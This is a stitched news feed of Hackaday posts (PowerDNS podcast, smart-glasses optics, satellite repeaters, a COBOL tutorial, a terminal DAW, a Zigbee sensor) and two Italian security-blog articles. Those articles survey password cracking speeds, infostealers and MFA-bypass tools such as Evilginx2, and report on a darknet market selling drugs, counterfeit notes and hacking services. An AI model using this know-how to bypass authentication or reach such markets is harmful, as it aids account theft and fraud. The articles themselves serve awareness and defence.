This week, Jonathan Bennett and Dan Lynch chat with Peter van Dijk about PowerDNS! Is the problem always DNS? How did PowerDNS start? And just how big can PowerDNS scale? Watch to find out!

• github.com/PowerDNS/
• github.com/Habbie
• github.com/voorkant/
• 7bits.nl/journal/

youtube.com/embed/mof49aNISg8?…

Did you know you can watch the live recording of the show right on our YouTube Channel? Have someone you’d like us to interview? Let us know, or contact the guest and have them contact us! Take a look at the schedule here.

play.libsyn.com/embed/episode/…

Direct Download in DRM-free MP3.

If you’d rather read along, here’s the transcript for this week’s episode.

Places to follow the FLOSS Weekly Podcast:

• Spotify
• RSS

Theme music: “Newer Wave” Kevin MacLeod (incompetech.com)

Licensed under Creative Commons: By Attribution 4.0 License

hackaday.com/2025/04/30/floss-…

Smart glasses are a complicated technology to work with. The smart part is usually straightforward enough—microprocessors and software are perfectly well understood and easy to integrate into even very compact packages. It’s the glasses part that often proves challenging—figuring out the right optics to create a workable visual interface that sits mere millimeters from the eye.

Dev Kennedy is no stranger to this world. He came to the 2024 Hackaday Supercon to give a talk and educate us all on photonics, optical stacks, and the technology at play in the world of smart glasses.

Good Optics

youtube.com/embed/DssK3cYSPCw?…

Dev’s talk begins with an apology. He notes that it’s not possible to convey an entire photonics and optics syllabus in a short presentation, which is understandable enough. His warning, regardless, is that his talk is as dense as possible to maximise the insight into the technical information he has to offer.

Things get heavy fast, as Dev dives into a breakdown of all the different basic technologies out there that can be used for building smart glasses. On one slide, he lays them all out with pros and cons across the board. There are a wide range of different illumination and projection technologies, everything from micro-OLED displays to fancy liquid crystal on silicon (LCOS) devices that are used to create an image with the aid of laser illumination. When you’re building smart glasses, though, that’s only half the story.
Dev explains the various optical technologies involved in AR and their strengths and weaknesses.
Once you’ve got something to make an image, you then need something to put it on in front of the eye. Dev goes on to talk about different techniques for doing this, from reflective waveguides to the amusingly-named birdbath combiners. Ultimately, you’re hunting for something that provides a clear and visible image to the user in all conditions, while still providing a great view of the world around them, too. This can be particularly challenging in high-brightness conditions, like walking around outdoors in daylight.

The talk also focuses on a particular bugbear for Dev—the fact that AR and VR aren’t treated as differently as they should be. “VR is a stack of pancakes,” says Dev. “Why is it a stack of pancakes? It’s because all of the PCBs, the optics, the emissions source for the light—is in front of the user’s nose.” Because VR is just about beaming images into the eye, with no regard for the outside world, it’s a little more straightforward. “It’s basically a stack of technology outward from the eye relief point to the back of the device.” Dev explains.

When it comes to AR, though, the solutions must be more complicated. “What’s different is AR is actually an archer,” says Dev, referring to the way such devices must fling light around. “What an archer does is it shoots light around the side of the arm, and it might have to bend it one way or another, up on the crossbar and spread it out through a waveguide, and at the very exist point… at the coupling out portion… the light has to make one more right turn… towards your eye.” Ultimately, the optics and display hardware involved tend to diverge a long way from what can be used in VR displays. “These technologies are fundamentally different,” says Dev. “It strains me to great extent that people kind of batch them into the same category.”
Snapchat’s fifth-generation Spectacles have some interesting optics, but they’re perhaps not quite market ready in Dev’s opinion.
The talk also steps away from raw hardware chat, and covers some of the devices on the market, and those that left it years ago. Dev makes casual mention of Google Glass, spawned all the way back in 2013, before also noting developments Microsoft made with Hololens over the year. As for the current state of play, Dev namechecks Project Orion from Meta, as well as the fifth-generation of Snapchat Spectacles.

He gives particular credit to Meta for their work on refining input modalities that work with the smart glasses interrface paradigm. Meanwhile, he notes Snapchat needs work on “comfort, weight, and looks,” given how bulky their current product is. Overall, with these products, there are problems to be overcome before they can really become mainstream tools for every day use. “The important part is the relatability of these devices,” Dev goes on to explain. “We don’t see that just yet, as a $25,000 device from Meta and something that is too thick to be socially acceptable from Snapchat.

Fundamentally, as Dev’s talk highlights, AR remains a technology still at a nascent stage of development. It’s worth remembering—it took decades to develop computers that could fit in our pockets (smartphones) or on our wrists (smartwatches). Expect smart glasses to actually go mainstream as soon as the technical and optical issues are worked out, and the software and interface solutions actually help people in day to day life.

hackaday.com/2025/04/30/superc…

One of the first things that an amateur radio operator is likely to do once receiving their license is grab a dual-band handheld and try to make contacts with a local repeater. After the initial contacts, though, many hams move on to more technically challenging aspects of the hobby. One of those being activating space-based repeaters instead of their terrestrial counterparts. [saveitforparts] takes a look at some more esoteric uses of these radio systems in his latest video.

There are plenty of satellite repeaters flying around the world that are actually legal for hams to use, with most being in low-Earth orbit and making quick passes at predictable times. But there are others, generally operated by the world’s militaries, that are in higher geostationary orbits which allows them to serve a specific area continually. With a specialized three-dimensional Yagi-Uda antenna on loan, [saveitforparts] listens in on some of these signals. Some of it is presumably encrypted military activity, but there’s also some pirate radio and state propaganda stations.

There are a few other types of radio repeaters operating out in space as well, and not all of them are in geostationary orbit. Turning the antenna to the north, [saveitforparts] finds a few Russian satellites in an orbit specifically designed to provide polar regions with a similar radio service. These sometimes will overlap with terrestrial radio like TV or air traffic control and happily repeat them at brief intervals.

[saveitforparts] has plenty of videos looking at other satellite communications, including grabbing images from Russian weather satellites, using leftover junk to grab weather data from geostationary orbit, and accessing the Internet via satellite with 80s-era technology.

youtube.com/embed/PDwiKLkGMjo?…

hackaday.com/2025/04/30/radio-…

As the Common Business Oriented Language, COBOL has a long and storied history. To this day it’s quite literally the financial bedrock for banks, businesses and financial institutions, running largely unnoticed by the world on mainframes and similar high-reliability computer systems. That said, as a domain-specific language targeting boring business things it doesn’t quite get the attention or hype as general purpose programming or scripting languages. Its main characteristic in the public eye appears be that it’s ‘boring’.

Despite this, COBOL is a very effective language for writing data transactions, report generating and related tasks. Due to its narrow focus on business applications, it gets one started with very little fuss, is highly self-documenting, while providing native support for decimal calculations, and a range of I/O access and database types, even with mere files. Since version 2002 COBOL underwent a number of modernizations, such as free-form code, object-oriented programming and more.

Without further ado, let’s fetch an open-source COBOL toolchain and run it through its paces with a light COBOL tutorial.

Spoiled For Choice

It used to be that if you wanted to tinker with COBOL, you pretty much had to either have a mainframe system with OS/360 or similar kicking around, or, starting in 1999, hurl yourself at setting up a mainframe system using the Hercules mainframe emulator. Things got a lot more hobbyist & student friendly in 2002 with the release of GnuCOBOL, formerly OpenCOBOL, which translates COBOL into C code before compiling it into a binary.

While serviceable, GnuCOBOL is not a compiler, and does not claim any level of standard adherence despite scoring quite high against the NIST test suite. Fortunately, The GNU Compiler Collection (GCC) just got updated with a brand-new COBOL frontend (gcobol) in the 15.1 release. The only negative is that for now it is Linux-only, but if your distribution of choice already has it in the repository, you can fetch it there easily. Same for Windows folk who have WSL set up, or who can use GnuCOBOL with MSYS2.

With either compiler installed, you are now ready to start writing COBOL. The best part of this is that we can completely skip talking about the Job Control Language (JCL), which is an eldritch horror that one would normally be exposed to on IBM OS/360 systems and kin. Instead we can just use GCC (or GnuCOBOL) any way we like, including calling it directly on the CLI, via a Makefile or integrated in an IDE if that’s your thing.

Hello COBOL

As is typical, we start with the ‘Hello World’ example as a first look at a COBOL application:
IDENTIFICATION DIVISION.
PROGRAM-ID. hello-world.
PROCEDURE DIVISION.
DISPLAY "Hello, world!".
STOP RUN.
Assuming we put this in a file called hello_world.cob, this can then be compiled with e.g. GnuCOBOL: cobc -x -free hello_world.cob.

The -x indicates that an executable binary is to be generated, and -free that the provided source uses free format code, meaning that we aren’t bound to specific column use or sequence numbers. We’re also free to use lowercase for all the verbs, but having it as uppercase can be easier to read.

From this small example we can see the most important elements, starting with the identification division with the program ID and optionally elements like the author name, etc. The program code is found in the procedure division, which here contains a single display verb that outputs the example string. Of note is the use of the period (.) as a statement terminator.

At the end of the application we indicate this with stop run., which terminates the application, even if called from a sub program.

Hello Data

As fun as a ‘hello world’ example is, it doesn’t give a lot of details about COBOL, other than that it’s quite succinct and uses plain English words rather than symbols. Things get more interesting when we start looking at the aspects which define this domain specific language, and which make it so relevant today.

Few languages support decimal (fixed point) calculations, for example. In this COBOL Basics project I captured a number of examples of this and related features. The main change is the addition of the data division following the identification division:
DATA DIVISION.
WORKING-STORAGE SECTION.
01 A PIC 99V99 VALUE 10.11.
01 B PIC 99V99 VALUE 20.22.
01 C PIC 99V99 VALUE 00.00.
01 D PIC $ZZZZV99 VALUE 00.00.
01 ST PIC $*(5).99 VALUE 00.00.
01 CMP PIC S9(5)V99 USAGE COMP VALUE 04199.04.
01 NOW PIC 99/99/9(4) VALUE 04102034.
The data division is unsurprisingly where you define the data used by the program. All variables used are defined within this division, contained within the working-storage section. While seemingly overwhelming, it’s fairly easily explained, starting with the two digits in front of each variable name. This is the data level and is how COBOL structures data, with 01 being the highest (root) level, with up to 49 levels available to create hierarchical data.

This is followed by the variable name, up to 30 characters, and then the PICTURE(or PIC) clause. This specifies the type and size of an elementary data item. If we wish to define a decimal value, we can do so as two numeric characters (represented by 9) followed by an implied decimal point V, with two decimal numbers (99). As shorthand we can use e.g. S9(5) to indicate a signed value with 5 numeric characters. There a few more special characters, such as an asterisk which replaces leading zeroes and Z for zero suppressing.

The value clause does what it says on the tin: it assigns the value defined following it to the variable. There is however a gotcha here, as can be seen with the NOW variable that gets a value assigned, but due to the PIC format is turned into a formatted date (04/10/2034).

Within the procedure division these variables are subjected to addition (ADD A TO B GIVING C.), subtraction with rounding (SUBTRACT A FROM B GIVING C ROUNDED.), multiplication (MULTIPLY A BY CMP.) and division (DIVIDE CMP BY 20 GIVING ST.).

Finally, there are a few different internal formats, as defined by USAGE: these are computational (COMP) and display (the default). Here COMP stores the data as binary, with a variable number of bytes occupied, somewhat similar to char, short and int types in C. These internal formats are mostly useful to save space and to speed up calculations.

Hello Business

In a previous article I went over the reasons why a domain specific language like COBOL cannot be realistically replaced by a general language. In that same article I discussed the Hello Business project that I had written in COBOL as a way to gain some familiarity with the language. That particular project should be somewhat easy to follow with the information provided so far. New are mostly file I/O, loops, the use of perform and of course the Report Writer, which is probably best understood by reading the IBM Report Writer Programmer’s Manual (PDF).

Going over the entire code line by line would take a whole article by itself, so I will leave it as an exercise for the reader unless there is somehow a strong demand by our esteemed readers for additional COBOL tutorial articles.

Suffice it to say that there is a lot more functionality in COBOL beyond these basics. The IBM ILE COBOL reference (PDF), the IBM Mainframer COBOL tutorial, the Wikipedia entry and others give a pretty good overview of many of these features, which includes object-oriented COBOL, database access, heap allocation, interaction with other languages and so on.

Despite being only a novice COBOL programmer at this point, I have found this DSL to be very easy to pick up once I understood some of the oddities about the syntax, such as the use of data levels and the PIC formats. It is my hope that with this article I was able to share some of the knowledge and experiences I gained over the past weeks during my COBOL crash course, and maybe inspire others to also give it a shot. Let us know if you do!

hackaday.com/2025/04/30/a-gent…

Domani celebreremo uno degli elementi più iconici – e al tempo stesso vulnerabili – della nostra vita digitale: la password. Da semplice chiave d’accesso inventata negli anni ’60 per proteggere i primi sistemi informatici multiutente, la password è diventata un simbolo universale della sicurezza online. Ma se una volta bastava una parola segreta per sentirsi al sicuro, oggi non è più così: viviamo in un’epoca in cuihacker, malware, botnet e infostealerpossono violare anche gli account più protetti in pochi secondi.

In questo articolo ripercorreremo le origini delle password – a partire dal lavoro pionieristico di Fernando Corbatò – e racconteremo come si è evoluto (e in molti casi sgretolato) il loro ruolo nella cybersicurezza moderna. Analizzeremo il fenomeno delle credenziali rubate, il mercato nero che le alimenta, l’ascesa degli infostealer, il ruolo delle GPU nel cracking degli hash, e l’apparente “ultima speranza”: l’autenticazione multifattore.

Ma anche questa, oggi, ha i suoi punti deboli. Preparati a scoprire perché la password potrebbe non essere più il tuo scudo, ma il tuo punto debole.

Le origini delle password: Fernando Corbatò e il primo sistema multiutente

Le password, come le conosciamo oggi, hanno una storia che affonda le radici nei primi esperimenti di elaborazione condivisa degli anni ’60. A introdurle fu Fernando J. Corbatò, un informatico del MIT, considerato uno dei padri fondatori della moderna sicurezza informatica.

Corbatò guidava lo sviluppo del CTSS (Compatible Time-Sharing System), uno dei primi sistemi operativi che permetteva a più utenti di lavorare contemporaneamente sullo stesso mainframe. Era una rivoluzione per l’epoca: ogni utente aveva un account personale, accessibile tramite terminale, e necessitava di un modo per proteggere i propri file dagli altri utenti. La soluzione? Un semplice meccanismo d’accesso: la password.
Fernando José Corbató (Oakland, 1º luglio 1926 – Newburyport, 12 luglio 2019) è stato un informatico statunitense e a lui viene accreditata l’invenzione della password.
All’epoca, le password venivano archiviate in un file di testo non cifrato, accessibile da amministratori e tecnici. Questo dettaglio si rivelò presto problematico: nel 1966, un giovane programmatore riuscì a stampare il file contenente tutte le password degli utenti del CTSS (Compatible Time-Sharing System), semplicemente sfruttando un errore di permessi.

Era il primo data breach della storia documentato, e metteva già in luce una delle debolezze strutturali del sistema.

La filosofia di Stallman e la “password blank”

In quegli stessi ambienti del MIT, anni dopo, emerse una figura che avrebbe portato avanti un’idea radicalmente opposta alla protezione tramite password: Richard Stallman, padre del movimento del software libero. Stallman lavorava al progetto GNU e frequentava gli stessi laboratori dove Corbatò aveva sviluppato il CTSS.

Quando le password furono implementate anche sui sistemi ITS (Incompatible Timesharing System), Stallman rifiutò apertamente l’idea. Trovava le restrizioni d’accesso una violazione della cultura collaborativa e aperta della comunità hacker originaria. Per protesta, lasciò il campo della password vuoto, permettendo l’accesso diretto al suo account — un gesto che divenne noto come “password blank”.
Richard Matthew Stallman (New York, 16 marzo 1953) è un programmatore, informatico, hacker e attivista statunitense.
Non solo: Stallman arrivò a scrivere uno script che disabilitava le password e lo condivise tra i colleghi. L’idea era: “Se disabiliti la tua password, chiunque potrà accedere al tuo account. Ma se tutti lo fanno, nessuno potrà abusare del sistema, perché nessuno ha più il controllo esclusivo”.

Un’eredità che ci ha segnato

Sebbene oggi quella visione libertaria sia impraticabile in un mondo digitale pieno di minacce, il dibattito tra apertura e sicurezza è rimasto centrale. L’introduzione delle password è stata un passaggio cruciale nella storia dell’informatica, ma anche il primo segnale che la sicurezza informatica è sempre un compromesso tra accessibilità e protezione.

Oggi, guardando a quell’epoca pionieristica, possiamo apprezzare non solo l’ingegno tecnico di Corbatò, ma anche la tensione ideologica che ha accompagnato l’evoluzione della cybersicurezza sin dalle sue origini.

Crescita, complessità e caduta di efficacia

Nel corso degli anni, la password ha subito un’evoluzione dettata non tanto dall’innovazione, quanto dalla necessità di adattarsi a minacce sempre più sofisticate. Dai semplici codici alfanumerici iniziali si è passati a criteri di complessità crescenti: lettere maiuscole e minuscole, numeri, caratteri speciali, e lunghezze minime obbligatorie.

Ma questa escalation di requisiti ha portato con sé un problema non trascurabile: l’usabilità.

Password complesse… ma prevedibili

Il paradosso è evidente: più complesse sono le password, più l’utente tende a semplificarne la gestione. Questo ha portato alla nascita di pattern ricorrenti, come:

• Sostituzioni prevedibili: P@ssw0rd, Admin123!, Estate2024
• Riutilizzo su più piattaforme: stessa password per email, social e banca (fenomeno del password reuse)
• Varianti incrementali: Password1, Password2, Password3…

Le password iniziarono a essere definite “forti” solo sulla carta, ma in realtà venivano facilmente indovinate, pescate da leak precedenti o craccate offline. Il database di password comuni, come il celebre “rockyou.txt”, è oggi il punto di partenza per gran parte degli attacchi a dizionario.

Il tempo gioca contro le password

Con l’evoluzione dell’hardware, il brute forcing di password protette da hash non è più un processo lungo e inefficiente. Software come Hashcat e John the Ripper, abbinati a GPU potenti, permettono di testare milioni (o anche miliardi) di combinazioni al secondo.

Alcuni esempi pratici (con hardware consumer di fascia alta):

• Una password di 8 caratteri alfanumerica può essere craccata in meno di 1 ora
• Una password da 10 caratteri con simboli può essere craccata in giorni
• Se l’hash non ha salt o usa algoritmi deboli (es. MD5, SHA1), il tempo si riduce drasticamente

Gli algoritmi di hash sono diventati più resistenti (come bcrypt, scrypt, Argon2), ma spesso sono ancora usati con configurazioni deboli o non aggiornate, specialmente su sistemi legacy.

L’illusione della forza apparente

Un’altra trappola è la cosiddetta “entropia apparente”: una password può sembrare forte all’occhio umano perché contiene simboli e numeri, ma se segue una struttura comune (es. NomeCognome@Anno), è in realtà facile da prevedere per un attaccante che usa regole di mutazione nei propri attacchi con dizionario.

Questa evoluzione dimostra come la password, da strumento di protezione, sia diventata un tallone d’Achille: troppo debole se semplice, troppo complicata se sicura — ma in entrambi i casi spesso inefficace se non affiancata da altre misure.

Infostealer, botnet e il mercato nero delle credenziali rubate

Se il furto di password una volta avveniva principalmente tramite attacchi diretti ai server, oggi la vera minaccia arriva dai dispositivi degli utenti, tramite malware specializzati chiamati infostealer. Questi programmi malevoli sono progettati per rubare informazioni sensibili direttamente dai computer infetti, in particolare username, password, cookie di sessione, wallet di criptovalute, token di accesso e dati autofill dei browser.
Schema di infezione da infostealer attraverso una mail di phishing e addizione del sistema infetto ad una botnet controllata da un attaccante (Fonte Red Hot Cyber)

Infostealer: il ladro silenzioso

Gli infostealer operano senza fare rumore, spesso nascosti in allegati e-mail, file craccati, software pirata, generatori di chiavi e strumenti “freemium” apparentemente legittimi. Una volta eseguiti, analizzano il sistema e inviano in tempo reale le informazioni raccolte a server remoti controllati dagli attaccanti.

I più noti e diffusi includono:

• RedLine
• Raccoon Stealer
• Vidar
• Lumma Stealer
• Aurora

Questi malware sono spesso venduti “as a service” nei canali underground, con pannelli di controllo semplici da usare anche per attori non tecnici.

Le botnet: reti di dispositivi compromessi

Molti infostealer vengono distribuiti attraverso botnet, ovvero reti di dispositivi infetti controllati da remoto. Una volta compromesso un dispositivo, viene “arruolato” e può essere utilizzato per:

• Diffondere ulteriormente malware
• Avviare attacchi DDoS
• Rubare altre credenziali e dati bancari
• Vendere accessi remoti (es. RDP, SSH) nel dark web

Botnet come Emotet, Trickbot e Qakbot hanno dominato per anni lo scenario mondiale, agendo come infrastrutture modulari che distribuiscono payload diversi in base agli interessi degli operatori.

Il mercato nero delle credenziali rubate

I dati raccolti da infostealer e botnet alimentano un fiorente mercato nero nei forum underground, nei marketplace onion e nei canali Telegram illegali. Le credenziali vengono vendute in blocco o consultate attraverso strumenti come:

• Logs markets: portali che permettono di cercare login rubati per sito o paese
• Botshop: piattaforme dove è possibile acquistare l’accesso completo a un profilo compromesso, inclusi cookie, fingerprint del browser e sessioni attive
• Access broker: attori specializzati nella vendita di accessi a reti aziendali compromesse, spesso poi rivenduti a gruppi ransomware

Un singolo cookie di sessione valido (es. di Google, Facebook, Instagram o servizi bancari) può valere più di 50$, perché consente l’accesso senza nemmeno conoscere la password.

Non si ruba solo la password: si ruba l’identità digitale

Questa nuova generazione di minacce dimostra che la password non è più l’unico bersaglio. Oggi vengono rubate intere identità digitali, fatte di token, fingerprint del browser, cronologia, geolocalizzazione, e molto altro.

L’infrastruttura criminale è altamente organizzata, con ruoli distinti tra chi sviluppa malware, chi lo diffonde, chi gestisce l’infrastruttura cloud per ricevere i dati, e chi li monetizza. Questo fenomeno si chiama MaasS (Malware as a service) è consente anche a persone alle prime armi di utilizzare soluzioni e strumenti altamente pervasivi pagando una quota di associazione.

Autenticazione MFA: la soluzione (quasi) obbligata

Con l’aumento vertiginoso dei furti di credenziali, la password – da sola – non è più sufficiente a proteggere gli accessi digitali. Da qui nasce l’esigenza di un secondo livello di difesa: l’autenticazione multifattoriale (MFA), oggi considerata una misura fondamentale, se non addirittura obbligatoria, per la sicurezza dei sistemi informativi.

La MFA prevede che, oltre alla password (qualcosa che sai), venga richiesto almeno un secondo fattore, come:

• Qualcosa che hai : smartphone, token hardware, chiave FIDO2/YubiKey, smartcard
• Qualcosa di biologico che possiedi: impronta digitale, riconoscimento facciale o vocale

Le combinazioni più comuni oggi includono:

• App di autenticazione (es. Google Authenticator, Microsoft Authenticator, Authy)
• Codici OTP via SMS o email (meno sicuri)
• Token hardware e soluzioni passwordless basate su FIDO2/WebAuthn

Perché è efficace?

La MFA, anche se imperfetta, riduce drasticamente il rischio di compromissione degli account:

• Anche se la password viene rubata, l’attaccante non può accedere senza il secondo fattore
• Rende inefficaci gran parte degli attacchi di phishing automatici
• Protegge dagli accessi non autorizzati da nuove geolocalizzazioni o dispositivi

Secondo Microsoft, l’MFA blocca oltre il 99% degli attacchi di account takeover se configurata correttamente.

Ma anche la MFA può essere aggirata

Nonostante i suoi benefici, la MFA non è invulnerabile. Oggi esistono strumenti e tecniche in grado di bypassarla, spesso sfruttando l’ingegneria sociale o la debolezza del fattore scelto.

Tecniche di bypass note:

• Attacchi di phishing in tempo reale: sfruttano reverse proxy come Evilginx2, Modlishka o EvilnoVNC per intercettare la sessione MFA al volo
• Richieste push “bombing”: invio ripetuto di notifiche di accesso finché l’utente approva per sfinimento (molto usato contro utenti Microsoft 365)
• SIM swap: clonazione della SIM per ricevere OTP via SMS
• Session hijacking: furto di cookie di sessione già autenticati tramite infostealer
• Malware kit venduti nei mercati underground che includono moduli per il bypass MFA (inclusi plugin Telegram, web panel e raccolta token)

“Oggi gli aggressori non si basano più su malware per violare le difese. Al contrario, sfruttano credenziali rubate e identità trusted per infiltrarsi silenziosamente nelle organizzazioni e muoversi lateralmente tra ambienti cloud, endpoint e di identità—spesso senza essere rilevati. Il Global Threat Report 2025 di CrowdStrike mette in evidenza questo cambiamento: il 79% degli attacchi di accesso iniziale avviene ormai senza l’uso di malware e l’attività degli access broker è aumentata del 50% su base annua. Il World Password Day è un promemoria puntuale per le organizzazioni affinché rivedano il proprio approccio alla sicurezza delle identità. Questo significa andare oltre la semplice igiene delle password tradizionali per adottare un approccio incentrato sull’identità—che applichi i principi dello Zero Trust, monitori continuamente utenti e accessi, rafforzi l’autenticazione con soluzioni MFA e passwordless e rimuova i privilegi non necessari. Integrare il rilevamento delle minacce all’identità basato sull’AI e unificare la visibilità tra endpoint, identità e cloud, aiuta a colmare le lacune su cui gli aggressori fanno affidamento” ha riportato Fabio Fratucello, Field CTO World Wide, CrowdStrike.

Se la MFA non basta è il turno del passkey e autenticazione passwordless

L’autenticazione multifattoriale non è la fine del problema, ma una componente di un approccio difensivo più ampio. Serve ad aumentare il costo dell’attacco, ma va combinata con:

• Monitoraggio continuo dei login e delle anomalie comportamentali (UEBA)
• Soluzioni di Zero Trust Architecture
• Difese contro infostealer (EDR, sandboxing, email security gateway)
• Educazione dell’utente su phishing e attacchi sociali

L’evoluzione naturale della MFA è l’abbandono della password. Le passkey – basate su WebAuthn – consentono di autenticarsi in modo sicuro usando biometria o PIN locali, senza mai inviare segreti al server. Apple, Google e Microsoft stanno già integrando attivamente questa tecnologia.

Conclusioni

Nel giorno del World Password Day, guardare al passato ci aiuta a comprendere quanto sia cambiato – e quanto debba ancora cambiare – il nostro rapporto con l’identità digitale.

Nate negli anni ’60 grazie al lavoro pionieristico di Fernando Corbatò, le password hanno rappresentato per decenni la chiave d’accesso alla dimensione informatica. Ma ciò che un tempo bastava a difendere un sistema multiutente, oggi non è più sufficiente a garantire la sicurezza di individui, aziende e intere infrastrutture critiche.

Con l’aumentare della complessità informatica, delle minacce automatizzate, della potenza computazionale disponibile per il cracking, e la diffusione di infostealer e botnet, le password da sole sono diventate una difesa fragile e facilmente aggirabile.

Le nostre credenziali – sempre più riutilizzate e vulnerabili – non sono più solo password, ma identità digitali composte da token, cookie, fingerprint e sessioni. Un mercato nero multimilionario alimenta il furto di queste identità, rendendo urgente il passaggio a modelli più forti e resilienti.

In questo scenario, l’autenticazione multifattoriale non è più un’opzione: è una necessità minima, un livello di protezione che ogni utente e organizzazione dovrebbe adottare per difendersi. Ma anche la MFA ha limiti e vulnerabilità. Per questo il futuro della sicurezza punta verso modelli passwordless, autenticazione biometrica e architetture zero-trust, dove l’accesso non è mai dato per scontato.

Il messaggio finale è chiaro: Non è più tempo di “password123”. È tempo di cambiare… di evolvere!

E’ arrivato il momento di farlo.

L'articolo Buon World Password Day! Tra MIT, Hacker, Infostealer e MFA. Perchè le Password sono vulnerabili proviene da il blog della sicurezza informatica.

As any Linux chat room or forum will tell you, the most powerful tool to any Linux user is a terminal emulator. Just about every program under the sun has a command line alternative, be it CAD, note taking, or web browsing. Likewise, the digital audio workstation (DAW) is the single most important tool to anyone making music. Therefore, [unspeaker] decided the two should, at last, be combined with a terminal based DAW called Tek.

Tek functions similarly to other DAWs, albeit with keyboard only input. For anyone used to working in Vim or Emacs (we ask you keep the inevitable text editor comment war civil), Tek will be very intuitive. Currently, the feature set is fairly spartan, but plans exist to add keybinds for save/load, help, and more. The program features several modes including a multi-track sequencer/sampler called the “arranger.” Each track in the arranger is color coded with a gradient of colors generated randomly at start for a fresh look every time.

Modern audio workflows often span across numerous programs, and Tek was built with this in mind. It can take MIDI input and output from the JACK Audio Connection Kit, and plans also exist to create a plugin server so Tek could be used with other DAWs like Ardor or Zrythm. Moreover, being a terminal program opens possibilities for complicated shell scripting and other such Linux-fu.

Maybe a terminal DAW is not your thing, so make sure to check out this physical one instead!

hackaday.com/2025/04/30/termin…

Ci sono luoghi nel web dove la normalità cede il passo all’illecito, dove l’apparenza di un marketplace moderno e funzionale si trasforma in una vetrina globale per ogni tipo di reato. Sono spazi accessibili solo attraverso la rete TOR, lontani dagli occhi dei motori di ricerca e delle forze dell’ordine. Uno di questi luoghi, nuovo e già particolarmente attivo, si chiama Mist Market.

Lanciato nell’aprile del 2025, Mist Market è un esempio perfetto di come il crimine digitale abbia ormai abbracciato logiche da e-commerce avanzato. A segnalarne la presenza e analizzarne le dinamiche è stato l’Insikt Group, il team di ricerca e threat intelligence di Recorded Future, che ne ha descritto la struttura e l’offerta con la consueta precisione investigativa.

Siamo quindi andati a guardare con il team di DarkLab questo nuovo market per comprenderne il funzionamento. E dopo una registrazione senza la richiesta di email, siamo dentro.

Una vetrina elegante per beni e servizi illeciti

Navigando tra le pagine del sito (accessibile solo tramite onion link su TOR), ci si trova di fronte a un’interfaccia ben organizzata: prodotti suddivisi per categoria, schede dettagliate, immagini, descrizioni e persino recensioni – proprio come su Amazon o eBay. Ma qui non si vendono gadget o elettronica di consumo. Qui si commercia droga, denaro falso, documenti clonati, account compromessi e servizi di hacking personalizzati.

Tra i tanti elementi che colpiscono nella segnalazione di Insikt Group, c’è soprattutto l’offerta di banconote false di alta qualità, descritte come “highly undetectable”. Non stiamo parlando di brutte copie stampate in cantina, ma di falsi professionali che, secondo quanto dichiarato dal venditore, riescono a superare indisturbati i test di verifica nei negozi, nei ristoranti, nelle stazioni ferroviarie e perfino nelle banche. Un’affermazione inquietante, che apre scenari di rischio sistemico per l’economia fisica di intere città.

Droghe da laboratorio e stupefacenti di vecchia data

Ma Mist Market non si limita al denaro contraffatto. In catalogo si trovano sostanze stupefacenti di ogni tipo. Particolarmente degna di nota è la presenza di metanfetamina cristallina, descritta nei dettagli come “polvere bianca cristallina o cristalli bianchi-bluastri”, con uno stock disponibile di ben 2.500 grammi.

Accanto a essa, spunta un nome che sembrava ormai appartenere al passato: Quaalude, in compresse da 300mg, dichiarate come “pharma grade”, ovvero di qualità farmaceutica. Un sedativo ipnotico diventato famoso negli anni ’70 (e poi bandito nella maggior parte dei Paesi), oggi torna a circolare grazie a circuiti paralleli come questo.

L’hacking come servizio

Tra le “offerte digitali”, invece, si fa notare una crescente richiesta e disponibilità di servizi di hacking su commissione. Gli annunci parlano chiaramente: sblocco di account WhatsApp, manipolazione del punteggio di credito (credit score), recupero di wallet Bitcoin e perfino accesso a carte “live” – cioè carte di credito con saldo ancora attivo e utilizzabili online.

Chi le vende, garantisce la validità per un’ora, tempo entro il quale l’acquirente deve verificarne l’effettivo funzionamento. Dopodiché, nessuna garanzia sarà più offerta, né su eventuali fondi residui, né su rimborsi. Un vero e proprio commercio “usa e getta” su cui nessuno risponde mai davvero.

Di seguito un esempio dei servizi offerti:

• Hacker for WhatsApp
• Hacker to Track Live GPS Location
• Hacker for Phone Monitoring Services
• Cheating Partner Monitoring
• Cryptocurrency Transaction Reversal
• Hacker to Hack Social Media Passwords
• Grade Change Hack
• Credit Score Hacker
• Online Exam Hack
• Cryptocurrency Mining Hack
• Change Criminal Record
• Western Union Transfers

Un’economia parallela regolata dalla Monero-economy

Tutte le transazioni su Mist Market avvengono rigorosamente in Monero (XMR), criptovaluta nota per il suo focus sulla privacy e la totale opacità dei flussi. A differenza di Bitcoin, Monero non consente il tracciamento delle transazioni, rendendo di fatto impossibile qualunque tentativo di indagine basata sull’analisi della blockchain. Per questo, è diventata la valuta preferita nei mercati darknet più avanzati.

E anche qui, la piattaforma non si limita a vendere. Offre anche canali di supporto, contatti diretti tramite Jabber, forum di riferimento (come Pitch Forum), e persino una politica commerciale che, almeno in apparenza, assicura “soddisfazione o sostituzione” – almeno entro determinati limiti e condizioni.

Conclusioni: una minaccia invisibile, ma concreta

L’analisi fornita da Insikt Group su Mist Market ci restituisce un quadro molto chiaro: il cybercrime non è più un fenomeno limitato a intrusioni o ransomware. È diventato una macchina commerciale complessa, che fonde criminalità finanziaria, traffico di droga, falsificazione, hacking e truffe digitali in un unico punto di accesso.

La capacità con cui questi venditori sanno creare e gestire “vetrine” funzionali, promozioni, sconti per acquisti all’ingrosso e customer care in stile business-to-business ci dice che siamo di fronte a vere e proprie aziende criminali, con livelli di efficienza e organizzazione allarmanti.

Ed è proprio questo il punto più preoccupante: non si tratta più di singoli attori improvvisati, ma di ecosistemi completi, resilienti, replicabili. In grado di riemergere sotto nuovi nomi anche se chiusi o smantellati. Un mercato nero digitale, che funziona meglio di quello legale.

E ogni giorno, mentre navighiamo tra le pagine di un e-commerce per acquistare un libro o un paio di scarpe, qualcun altro – da un’altra parte del mondo – acquista una banconota falsa, una dose di metanfetamina o un servizio per rubare un’identità. E lo fa con un click.

L'articolo Benvenuti su Mist Market: dove con un click compri droga, identità e banconote false proviene da il blog della sicurezza informatica.

Recently [Glen Akins] reported on Bluesky that the Zigbee-based sensor he had made for his garden’s rear gate was still going strong after a Summer and Winter on the original 2450 lithium coin cell. The construction plans and design for the unit are detailed in a blog post. At the core is the MS88SF2 SoM by Minew, which features a Nordic Semiconductor nRF52840 SoC that provides the Zigbee RF feature as well as the usual MCU shenanigans.

